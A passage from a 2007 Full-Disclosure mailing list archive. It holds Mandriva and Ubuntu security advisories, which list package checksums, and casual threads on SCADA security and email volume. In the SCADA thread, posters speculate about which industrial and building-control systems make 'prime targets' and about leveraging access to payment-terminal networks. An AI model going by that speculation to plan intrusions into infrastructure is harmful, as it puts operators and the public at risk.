 697a3930734d4570db3aeadc0aac2032  2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.3mdv2007.1.x86_64.rpm
 c8a20e21d7b07363c8efc8b23078a5e8  2007.1/x86_64/apache-mod_file_cache-2.2.4-6.3mdv2007.1.x86_64.rpm
 d42e4f3cc5ca6ac006d3e4bb7a750273  2007.1/x86_64/apache-mod_ldap-2.2.4-6.3mdv2007.1.x86_64.rpm
 e8fc195d18dbb431257dd816bdfa7845  2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.3mdv2007.1.x86_64.rpm
 ce7184cd8abf4aa7c98d47a64133c19f  2007.1/x86_64/apache-mod_proxy-2.2.4-6.3mdv2007.1.x86_64.rpm
 98957b99a54cb32d6ba055d5f059b7ec  2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.3mdv2007.1.x86_64.rpm
 17b824837cf63210790e6201154cb94a  2007.1/x86_64/apache-mod_ssl-2.2.4-6.3mdv2007.1.x86_64.rpm
 5a2d9f93603eebdde04f8967a07b063d  2007.1/x86_64/apache-mod_userdir-2.2.4-6.3mdv2007.1.x86_64.rpm
 44f0ad99c93ae8905a2d32b799dc1520  2007.1/x86_64/apache-modules-2.2.4-6.3mdv2007.1.x86_64.rpm
 c5c469771e2f25683ddba3f694e28968  2007.1/x86_64/apache-mpm-event-2.2.4-6.3mdv2007.1.x86_64.rpm
 b691f2e760bdd30c797e46269842a437  2007.1/x86_64/apache-mpm-itk-2.2.4-6.3mdv2007.1.x86_64.rpm
 fa3551d06a7af5a31a040f90dd215a1d  2007.1/x86_64/apache-mpm-prefork-2.2.4-6.3mdv2007.1.x86_64.rpm
 8d2a09ba2b175cd36bbc0dc6dc4c18ea  2007.1/x86_64/apache-mpm-worker-2.2.4-6.3mdv2007.1.x86_64.rpm
 7037cb86ca137f40364749a0933b432c  2007.1/x86_64/apache-source-2.2.4-6.3mdv2007.1.x86_64.rpm 
 299d821f2388c0b4eb49992472225564  2007.1/SRPMS/apache-2.2.4-6.3mdv2007.1.src.rpm

 Corporate 3.0:
 5bbdb8ac0d8133c1b09d373cbe35f5ea  corporate/3.0/i586/apache2-2.0.48-6.15.C30mdk.i586.rpm
 e14dfcec88913b5245d683502ff684d1  corporate/3.0/i586/apache2-common-2.0.48-6.15.C30mdk.i586.rpm
 642b4136b2e2915db59801888b41d1e6  corporate/3.0/i586/apache2-devel-2.0.48-6.15.C30mdk.i586.rpm
 c8824d8aa09e4917f9b35b1c659b5181  corporate/3.0/i586/apache2-manual-2.0.48-6.15.C30mdk.i586.rpm
 09af9e7945caec7163a12be1a14302ee  corporate/3.0/i586/apache2-mod_cache-2.0.48-6.15.C30mdk.i586.rpm
 374a782a9211ee321f31a4e716d6bb97  corporate/3.0/i586/apache2-mod_dav-2.0.48-6.15.C30mdk.i586.rpm
 88a31c94bc077aa0a91f000b839d4b69  corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.15.C30mdk.i586.rpm
 8e55a5d1949805b0a6a4f84d571ab4ff  corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.15.C30mdk.i586.rpm
 16b573b8a914ab130ac660cce8bddfdb  corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.15.C30mdk.i586.rpm
 68fdee10fc216a354849a6fc5d89e7cf  corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.15.C30mdk.i586.rpm
 9e75fe104df971a7a707efb0d6735288  corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.15.C30mdk.i586.rpm
 006f66a419a5f81085bc6fd74e4c1235  corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.15.C30mdk.i586.rpm
 f0910407a4042202cec58ebdb74127d3  corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.15.C30mdk.i586.rpm
 43578ffa09c88aa636c6df329cebe81a  corporate/3.0/i586/apache2-modules-2.0.48-6.15.C30mdk.i586.rpm
 c5c8b21b0bbc8e57f81baa317ccba3f3  corporate/3.0/i586/apache2-source-2.0.48-6.15.C30mdk.i586.rpm
 f38fcbb77b956304d63d36ad7b003b05  corporate/3.0/i586/libapr0-2.0.48-6.15.C30mdk.i586.rpm 
 aab66cf8d305132c45dfa6b8b5fced4d  corporate/3.0/SRPMS/apache2-2.0.48-6.15.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 52f3a65b7c0e82d517e66d4b176aa33e  corporate/3.0/x86_64/apache2-2.0.48-6.15.C30mdk.x86_64.rpm
 b54119aca1142e9e9a848cbc18f2a5d0  corporate/3.0/x86_64/apache2-common-2.0.48-6.15.C30mdk.x86_64.rpm
 e5ac1fdacf86a8214105cc13d3c439aa  corporate/3.0/x86_64/apache2-devel-2.0.48-6.15.C30mdk.x86_64.rpm
 1bc73ab39962a806585f1c669b8c1f7e  corporate/3.0/x86_64/apache2-manual-2.0.48-6.15.C30mdk.x86_64.rpm
 87af39a3721856a710383cd51815fbaf  corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.15.C30mdk.x86_64.rpm
 c03c3c1774c1baafaf44a4bb17ca74c6  corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.15.C30mdk.x86_64.rpm
 0ef802c1187c979d48db6ae4672fb21b  corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.15.C30mdk.x86_64.rpm
 c7d6772332baffc85fd1472e018f5546  corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.15.C30mdk.x86_64.rpm
 45965308167632623ff93de397d4041d  corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.15.C30mdk.x86_64.rpm
 17e2a48cc23d7983351706745c7cd553  corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.15.C30mdk.x86_64.rpm
 5b047d484852dd9a2000028d8dcfb7e6  corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.15.C30mdk.x86_64.rpm
 a5f32074ec310263bc03648b81d44173  corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.15.C30mdk.x86_64.rpm
 79c4a90fa0ab3bfa8dbe9b12daeff4cd  corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.15.C30mdk.x86_64.rpm
 15af8e5591d5ff99f5c157a0c01d4174  corporate/3.0/x86_64/apache2-modules-2.0.48-6.15.C30mdk.x86_64.rpm
 462316c74fff690d2e98116ddf614d54  corporate/3.0/x86_64/apache2-source-2.0.48-6.15.C30mdk.x86_64.rpm
 20553b85bf243e5986af1a3551549ed8  corporate/3.0/x86_64/lib64apr0-2.0.48-6.15.C30mdk.x86_64.rpm 
 aab66cf8d305132c45dfa6b8b5fced4d  corporate/3.0/SRPMS/apache2-2.0.48-6.15.C30mdk.src.rpm

 Corporate 4.0:
 7d50fe1ac32dec6c4d57dd850950bdb1  corporate/4.0/i586/apache-base-2.2.3-1.2.20060mlcs4.i586.rpm
 775785cf1a22f45a64d800fdfcc4a8bc  corporate/4.0/i586/apache-devel-2.2.3-1.2.20060mlcs4.i586.rpm
 79b64bb1793933f1c8b83e7eee2d4cfa  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.2.20060mlcs4.i586.rpm
 eac03081a34897376d542b7032dd03c2  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.2.20060mlcs4.i586.rpm
 2c223bb1645aadfba8e6d1d6a2c8756c  corporate/4.0/i586/apache-mod_cache-2.2.3-1.2.20060mlcs4.i586.rpm
 e4c4c07473f9644fc146e2f4d9ce95c8  corporate/4.0/i586/apache-mod_dav-2.2.3-1.2.20060mlcs4.i586.rpm
 13f85bc068b14e497873c6028520580a  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.2.20060mlcs4.i586.rpm
 aaa52a86e4a6d3e5322fa140edc5535a  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.2.20060mlcs4.i586.rpm
 574e07826a89f78883f2cfb3ca224e8c  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.2.20060mlcs4.i586.rpm
 451efb60480fd0680b6c4f955c46ccf4  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.2.20060mlcs4.i586.rpm
 73fa350b85ea63a5b3f69d8d387474aa  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.2.20060mlcs4.i586.rpm
 d2364f995210cdbbe324df10d49bef98  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.2.20060mlcs4.i586.rpm
 145b17e675a42bed7b3a8c5ee883cf45  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.2.20060mlcs4.i586.rpm
 92b82835be476736295c15954f2a9eb6  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.2.20060mlcs4.i586.rpm
 0dd6c7df0e3ea475b6b2d50ef4aa5ac0  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.2.20060mlcs4.i586.rpm
 d579208689ec9a72a599bf3510bdf942  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.2.20060mlcs4.i586.rpm
 6fd43dfcfc649c8bcd4692ba9ebeee07  corporate/4.0/i586/apache-modules-2.2.3-1.2.20060mlcs4.i586.rpm
 9fbf1dde58f17e3f0f29a8c3f1e1b6b6  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.2.20060mlcs4.i586.rpm
 72f26a52381b68a8bbc6e2fcc9c0ac8c  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.2.20060mlcs4.i586.rpm
 99a935e7047a27043159b6555d3444c7  corporate/4.0/i586/apache-source-2.2.3-1.2.20060mlcs4.i586.rpm 
 07d86b59ebeb3596997f6c3a64242d45  corporate/4.0/SRPMS/apache-2.2.3-1.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 35a789ac173ed3cc0dda52270a194bad  corporate/4.0/x86_64/apache-base-2.2.3-1.2.20060mlcs4.x86_64.rpm
 e9df753a94dfb136780651ac743e50eb  corporate/4.0/x86_64/apache-devel-2.2.3-1.2.20060mlcs4.x86_64.rpm
 3964c83541baaf5af0ccc828282a1954  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.2.20060mlcs4.x86_64.rpm
 554ea610010d5f361bcc87d75d8d0f6f  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.2.20060mlcs4.x86_64.rpm
 051c20e0f062d50a01c51ebad7dcb96d  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.2.20060mlcs4.x86_64.rpm
 59a05bd258ba6b4729238885d2fc0273  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.2.20060mlcs4.x86_64.rpm
 ceb391b54796f3ea763b81c5085da16c  corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.2.20060mlcs4.x86_64.rpm
 307726e1c4dfcca90093c19e3d17f504  corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.2.20060mlcs4.x86_64.rpm
 1500f6520843c6604192e4a621d5b9f1  corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.2.20060mlcs4.x86_64.rpm
 e0ac5eb68e21253d33928fa28f0acb25  corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.2.20060mlcs4.x86_64.rpm
 21c68fdaf26b13ed2177bf458979df1e  corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.2.20060mlcs4.x86_64.rpm
 28ef0171caf2d11cca8fe4f0bf2473db  corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.2.20060mlcs4.x86_64.rpm
 019893e83acbfb730f79a8eb364ea042  corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.2.20060mlcs4.x86_64.rpm
 202b1fc0dd2d9364530abbbb13f799b0  corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.2.20060mlcs4.x86_64.rpm
 5cd3084106482b3f01b41cd716c702b8  corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.2.20060mlcs4.x86_64.rpm
 6a18ec0935144ead6f037f41e852a892  corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.2.20060mlcs4.x86_64.rpm
 622bb60b53fb48aef1b5a7fc94be3298  corporate/4.0/x86_64/apache-modules-2.2.3-1.2.20060mlcs4.x86_64.rpm
 f573d1aef5f29f14f8764fce5ea31a1d  corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.2.20060mlcs4.x86_64.rpm
 842d5d6ef1c73fcb0b41b9ff18a75960  corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.2.20060mlcs4.x86_64.rpm
 1cae994b8a6fb2d2aa9a803d7bb3178d  corporate/4.0/x86_64/apache-source-2.2.3-1.2.20060mlcs4.x86_64.rpm 
 07d86b59ebeb3596997f6c3a64242d45  corporate/4.0/SRPMS/apache-2.2.3-1.2.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 463f2a0de557bfcf7ae0655e5381b22f  mnf/2.0/i586/apache2-2.0.48-6.16.M20mdk.i586.rpm
 56117551a5480c85920263bcefb32c09  mnf/2.0/i586/apache2-common-2.0.48-6.16.M20mdk.i586.rpm
 c7496b0bb82f802cd8d17819ee1308bc  mnf/2.0/i586/apache2-devel-2.0.48-6.16.M20mdk.i586.rpm
 6be15ca61d9a7cc4cc4c7e4e55c4ffd1  mnf/2.0/i586/apache2-manual-2.0.48-6.16.M20mdk.i586.rpm
 766a15298990769f14e5ad00745b9c7f  mnf/2.0/i586/apache2-mod_cache-2.0.48-6.16.M20mdk.i586.rpm
 21d7b83f3e1b80874c5c007c6659c470  mnf/2.0/i586/apache2-mod_dav-2.0.48-6.16.M20mdk.i586.rpm
 417055a9758a47db50fcd7ec0a7d4047  mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.16.M20mdk.i586.rpm
 90d4aa462e8edf12c52216fa4eeac6a1  mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.16.M20mdk.i586.rpm
 fbeb5bc02ada67198541cb4e1c2b1b27  mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.16.M20mdk.i586.rpm
 0f2e617217d9f418182ca89bab9703f0  mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.16.M20mdk.i586.rpm
 50e9dc2b73be1f0f3a45ca7da1adbcbf  mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.16.M20mdk.i586.rpm
 8352541a45d2c76ab840ca6f4b070ffb  mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.16.M20mdk.i586.rpm
 5744f88c6e59f26418f1f3f531f30734  mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.16.M20mdk.i586.rpm
 874dc6a00a02630401f7efeadc93935e  mnf/2.0/i586/apache2-modules-2.0.48-6.16.M20mdk.i586.rpm
 efbd0f5ac6f292474d29f83d36bf86eb  mnf/2.0/i586/apache2-source-2.0.48-6.16.M20mdk.i586.rpm
 15bd1fcd65bd487b6fd5bba0a8ec530d  mnf/2.0/i586/libapr0-2.0.48-6.16.M20mdk.i586.rpm 
 0e6b7bac08407b02457479763d27e885  mnf/2.0/SRPMS/apache2-2.0.48-6.16.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHVGk3mqjQ0CJFipgRAi2wAKCPuJzkUkyI8lcVRJ3Vu6IbvxMFrQCg3Qxf
w5lEeF1m8B+hT513FJVA1po=
=c4oi
-----END PGP SIGNATURE-----



From soufre at gmail.com  Tue Dec  4 00:01:40 2007
From: soufre at gmail.com (I. D.)
Date: Mon, 3 Dec 2007 19:01:40 -0500
Subject: [Full-disclosure] SCADA refresher
In-Reply-To: <e024ccca0712031151xd8453fdm9c376f38583fb639@mail.gmail.com>
References: <47505E42.90503@rogers.com> <47535341.6060206@rogers.com>
	<e024ccca0712031151xd8453fdm9c376f38583fb639@mail.gmail.com>
Message-ID: <71c852d10712031601y21a68202td38760820a7d4977@mail.gmail.com>

Datapac? In my experience, there aren't many things left there... of course,
I don't work in that industry. I thought most transactions/work took places
on other Canadian packet-switched networks. As for south of the border, I
know even less.

On Dec 3, 2007 2:51 PM, Dude VanWinkle <dudevanwinkle at gmail.com> wrote:

> Also Johnson Controls
>
> in 2005 they were busy converting the proprietary BACnet speaking
> SCADA devices to embedded windows XP, considering NASA and friends run
> JCI, and there is no good way to update embedded XP (AFAIK) remotely,
> these systems should be prime targets...
>
> Whats an MLP?
>
> -JP
>
> On Dec 2, 2007 7:52 PM, gmaggro <gmaggro at rogers.com> wrote:
> > Been giving myself a little refresher on SCADA, hope no-one minds the
> MLP.
> >
> > Stock presentation on SCADA security issues:
> >
> >
> http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf
> >
> > Ganesh Devarajan's Defcon presentation was interesting:
> >   http://video.google.com/videoplay?docid=2434649448102709100&hl=en
> >
> > Makes of SCADA and related products I have seen in actual use:
> >   Allen Bradley (hardware)
> >   Siemens       (hardware)
> >   RAND          (hardware)
> >   ABB           (hardware)
> >   Wonderware    (software, assuming this was what Ganesh was assaulting)
> >
> > Well, assuming it was Wonderware (http://us.wonderware.com) since in
> > multiple networks of hundreds of thousands of nodes, and the companies
> > that own them... Wonderware was the only SCADA related package that
> > creeped up.
> >
> > On a different and amusing note, X.25 was still in use in a number of
> > these locations. Take that for what you will, but I don't think that's a
> > good sign. Hello, Datapac! However I have little idea what the X.25
> > landscape is like anymore.  Would be interesting if both
> > credit/financial and infrastructure data regularly travelled over the
> > same paths. Get access to a lottery/debit terminal, or just its
> > connectivity, and leverage that.
> >
> > 24th Chaos Communication Congress "Hacking SCADA", it sure would be nice
> > to make it over:
> >   http://events.ccc.de/congress/2007/Fahrplan/events/2227.en.html
> >
> > More amusement, though it's a subscription site:
> >   http://www.digitalbond.com/wiki/index.php/SCADA_IDS_Signatures
> >
> > Anyone have any resources they'd care to share?
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071203/37c86ada/attachment.html 

From joey.mengele at hushmail.com  Mon Dec  3 21:35:35 2007
From: joey.mengele at hushmail.com (Joey Mengele)
Date: Mon, 03 Dec 2007 16:35:35 -0500
Subject: [Full-disclosure] Anyone have a reason for 2x the email flow
	today?
Message-ID: <20071203213535.B5C142283E@mailserver10.hushmail.com>

Same here. I also noticed I am more tired today than usual. Anyone 
else seeing this?

J

On Mon, 03 Dec 2007 15:49:17 -0500 Dude VanWinkle 
<dudevanwinkle at gmail.com> wrote:
>My servers are slammed...
>
>Anyone else notice anything?
>
>-JP
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

--
Tax Preparation Services - Click Here.
http://tagline.hushmail.com/fc/Ioyw6h4ep67ZOEYJqM4bCWKyzlcFTVMGDpjVuFVHqrFFzsja3IJaQ4/



From dudevanwinkle at gmail.com  Tue Dec  4 00:51:43 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Mon, 3 Dec 2007 19:51:43 -0500
Subject: [Full-disclosure] Anyone have a reason for 2x the email flow
	today?
In-Reply-To: <2089001063-1196729198-cardhu_decombobulator_blackberry.rim.net-1361672803-@bxe121.bisx.prod.on.blackberry>
References: <e024ccca0712031249t47708080u3de310cc327f89d8@mail.gmail.com>
	<2089001063-1196729198-cardhu_decombobulator_blackberry.rim.net-1361672803-@bxe121.bisx.prod.on.blackberry>
Message-ID: <e024ccca0712031651w4b48bdc7m6cba666b387adc1f@mail.gmail.com>

On Dec 3, 2007 7:45 PM,  <gjgowey at tmo.blackberry.net> wrote:
> Not much other than the weather outside is frightful, but inside it's so delightful.  :D
>
> Geoff
>
> Sent from my BlackBerry wireless handheld.


I guess its more complexity than volume...

damn spam..



From gjgowey at tmo.blackberry.net  Tue Dec  4 00:45:38 2007
From: gjgowey at tmo.blackberry.net (gjgowey at tmo.blackberry.net)
Date: Tue, 4 Dec 2007 00:45:38 +0000
Subject: [Full-disclosure] Anyone have a reason for 2x the email flow
	today?
In-Reply-To: <e024ccca0712031249t47708080u3de310cc327f89d8@mail.gmail.com>
References: <e024ccca0712031249t47708080u3de310cc327f89d8@mail.gmail.com>
Message-ID: <2089001063-1196729198-cardhu_decombobulator_blackberry.rim.net-1361672803-@bxe121.bisx.prod.on.blackberry>

Not much other than the weather outside is frightful, but inside it's so delightful.  :D

Geoff

Sent from my BlackBerry wireless handheld.

-----Original Message-----
From: "Dude VanWinkle" <dudevanwinkle at gmail.com>

Date: Mon, 3 Dec 2007 15:49:17 
To:Ring-of-Fire at yahoogroups.com, funsec <funsec at linuxbox.org>,Full-Disclosure <full-disclosure at lists.grok.org.uk>,incidents at securityfocus.com
Subject: Anyone have a reason for 2x the email flow today?


My servers are slammed...

Anyone else notice anything?

-JP

-------------------------------------------------------------------------
This list sponsored by: SPI Dynamics

ALERT: .How a Hacker Launches a SQL Injection Attack!.- White Paper
It's as simple as placing additional SQL commands into a Web Form input box
giving hackers complete access to all your backend systems! Firewalls and IDS
will not stop such attacks because SQL Injections are NOT seen as intruders.
Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!

https://download.spidynamics.com/1/ad/sql.asp?Campaign_ID=70160000000Cn8E
--------------------------------------------------------------------------

From jamie at ubuntu.com  Tue Dec  4 03:16:06 2007
From: jamie at ubuntu.com (Jamie Strandboge)
Date: Mon, 03 Dec 2007 22:16:06 -0500
Subject: [Full-disclosure] [USN-551-1] OpenLDAP vulnerabilities
Message-ID: <4754C676.1070908@ubuntu.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================
Ubuntu Security Notice USN-551-1          December 04, 2007
openldap vulnerabilities
CVE-2007-5707, CVE-2007-5708
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  slapd                           2.2.26-5ubuntu2.4

Ubuntu 6.10:
  slapd                           2.2.26-5ubuntu3.2

Ubuntu 7.04:
  slapd                           2.3.30-2ubuntu0.1

Ubuntu 7.10:
  slapd                           2.3.35-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Thomas Sesselmann discovered that the OpenLDAP slapd server
did not properly handle certain modify requests. A remote
attacker could send malicious modify requests to the server
and cause a denial of service. (CVE-2007-5707)

Toby Blake discovered that slapd did not properly terminate
an array while running as a proxy-caching server. A remote
attacker may be able to send crafted search requests to the
server and cause a denial of service. This issue only affects
Ubuntu 7.04 and 7.10. (CVE-2007-5708)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.4.diff.gz
      Size/MD5:   511262 b54753c0e681803599125b18bef714ff

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.4.dsc
      Size/MD5:     1020 519f96ba1375478163e3c40e881ae2d7

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26.orig.tar.gz
      Size/MD5:  2626629 afc8700b5738da863b30208e1d3e9de8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.4_amd64.deb
      Size/MD5:   130406 8d3bf04e5529528c0ac26530b2070f78

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.4_amd64.deb
      Size/MD5:   165830 e66f9e954c0ea05b4e2611ccd9fbcce6

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.4_amd64.deb
      Size/MD5:   961236 e5a89ad1cf97801efd27c52191703752

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.4_i386.deb
      Size/MD5:   118302 c57c5729bc9cf5ada18ebc3bef77d8da

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.4_i386.deb
      Size/MD5:   145954 caf31365b85db0e03a5f9884dda48fc7

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.4_i386.deb
      Size/MD5:   872794 8e5380a50fef5a25ac83c309f9a09a7d

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.4_powerpc.deb
      Size/MD5:   132560 bcef53015f0225ad7e216d94f23d1190

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.4_powerpc.deb
      Size/MD5:   157010 2132bdab3beff83ae731103602cdc38d

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.4_powerpc.deb
      Size/MD5:   959310 629b33d57e8087fbb8f5be51203f6dee

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.4_sparc.deb
      Size/MD5:   120616 13c31cc42532a60ceb499fc044356dc8

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.4_sparc.deb
      Size/MD5:   148044 3bf8d5ec833a67b9660bb7a448ae0c89

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.4_sparc.deb
      Size/MD5:   903250 43b642eccf4fdb4b2ae81d9f4e65236d

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu3.2.diff.gz
      Size/MD5:   512406 0a7387e1542e833d4fcf3dd458571805

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu3.2.dsc
      Size/MD5:     1020 2926a0c36b89ebb9dc498005f4a8c93a

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26.orig.tar.gz
      Size/MD5:  2626629 afc8700b5738da863b30208e1d3e9de8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.2_amd64.deb
      Size/MD5:   130568 2c0d6fd715c4049d464acc6da91db771

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.2_amd64.deb
      Size/MD5:   166602 43b9daf9f2938ee91818e08ef88e3897

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.2_amd64.deb
      Size/MD5:   958238 76f32588bf19a293993f59281a1b19db

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.2_i386.deb
      Size/MD5:   121234 8ef74f1ac973fd76c383c82d5ed1fcc8

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.2_i386.deb
      Size/MD5:   152394 20c8c28e5c8f62db165592a847728600

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.2_i386.deb
      Size/MD5:   900626 2fd37c48cbee64886b75665f3c4b22b7

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.2_powerpc.deb
      Size/MD5:   133566 9f8ff85e0bcc546a35174d5f8e4c32d4

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.2_powerpc.deb
      Size/MD5:   158770 7051d8aa41997d86ad9bdd1f0cbd09fd

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.2_powerpc.deb
      Size/MD5:   966444 a0a61d9af0fd64251f75cf6062e85834

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.2_sparc.deb
      Size/MD5:   121492 9e05e58bb98a5ddd53656fd82a23d45b

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.2_sparc.deb
      Size/MD5:   149232 8f73c53ad74062f446aac3c31ef953ff

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.2_sparc.deb
      Size/MD5:   909242 2a9d3a22330886f4bf727ea1d19187e0

Updated packages for Ubuntu 7.04:

  Source archives:


